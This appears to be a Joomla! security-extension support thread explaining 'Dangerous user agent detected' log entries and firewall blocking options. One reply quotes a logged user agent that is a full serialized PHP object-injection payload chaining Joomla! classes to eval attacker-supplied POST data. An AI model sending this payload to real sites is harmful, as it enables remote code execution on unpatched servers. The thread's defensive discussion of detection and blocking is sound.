What does it mean when I see "Dangerous user agent detected" in my system log? Does that mean a hack attempt? I don't see any kind of definitions on your site for this stuff?

This seems to be new functionality with an accompanying message I haven't seen before updating to 2.9.2 just now.

I'm curious as well and hoping for more information about what the villains are trying to achieve.

Willy

The latest Joomla! hacks that were reveled recently were performed via User Agent information. The latest RSFirewall! version incorporates an active scanner feature that detects user agents with potentially malicious data.

More on this topic on our blog.

since 2.92. i see more Dangerous user agent are detected, this was not in earlier versions.
So i am also curious what is so dangerous in this what is detected?? :
Debug informatie
User agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:102:"eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST))))));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}

It looks like some hacks were attempted on your Joomla! installation. The user agent information incorporates malware signatures. The latest Joomla! hacks are being performed via User Agent information.

I have seen this warning but am unclear whether this means there is already malware on my webserver or it's just a remote attack that has been blocked. I did suffer an attack where a couple of core files got changed recently (probably that latest hack that's now been fixed) and am concerned there may be malware lurking somewhere on the server which I don't know about.

Could we have a bit more clarity on what this error message actually means - a hack attempt has been blocked or malware is already present on the server?

This means that a site visitor (most likely a bot) that incorporated malicious code in its User Agent information has been blocked. It does not imply that your site has already been hacked. It would be best to run a System Check just to stay of the safe side.

I have a related question, why does the back-end of my RSFirewall config show "block" instead of "unblock" for an attack that has occurred for "Dangerous user agent detected" event?

The visitor that contained the malicious user agent never actually got to open your website. The "blocking" action is degined to restrict access for the visitor's IP address.

An additional comment to Alexp's reply is that you could activate Automatic Blacklisting. Here you can also set the # of attempts that lead to automatic blacklisting. I have set it to 2, as the second attempt ascertains that we have a repeat offender.

See Firewall Configuration, Active Scanner.

Willy